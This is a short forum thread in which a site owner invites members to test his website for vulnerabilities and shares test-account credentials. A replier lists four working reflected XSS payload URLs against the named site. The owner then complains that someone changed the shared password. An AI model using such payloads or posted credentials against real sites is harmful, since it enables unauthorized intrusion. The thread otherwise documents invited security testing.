![]() |
Сделали сайтик проверьте на уязвимости
http://gena.x53.ru
вот пароль от кабинета чтоб там потыкали) login:AntichatUser pass:1 О багах сообщите пжлст. |
Hello Truelamer,
Sorry that I speak only in English (Russian language is not yet installed on my pc ;) ). 1. I found a XSS: http://gena.x53.ru/cabinet.php?about_us=1'="><script>alert(/XSS-BY-LAEOT/)</script> # it's on all pages! (....(something)="Here we place our bad code)). 2. Another XSS: http://gena.x53.ru/cabinet.php?org_full=60="><script>alert(/XSS-BY-LAEOT/)</script>&active=1 3. XSS : http://gena.x53.ru/index.php?cid=1'="><script>alert(/XSS-BY-LAEOT/)</script>&aid=1'&archive=1' 4.XSS: http://gena.x53.ru/index.php?error=="><body onLoad=alert(/XSS-BY-LAEOT/)> ------------------------------------------------- That's all what i've found. And your login account doesn't work ;) But ok.. good luck with your site! LAEOT |
Цитата:
|
Блин я зол! Я пароль от кабинета давал не чтоб его меняли а чтоб тестили. Как теперь другие туда попадут? Я только завтра его изменю через БД когда на работу приду. НУ ИМЕЙТЕ ЖЕ СОВЕСТЬ!
|
Цитата:
But i'll test it when you have reset the password tomorrow :) |
| Время: 15:38 |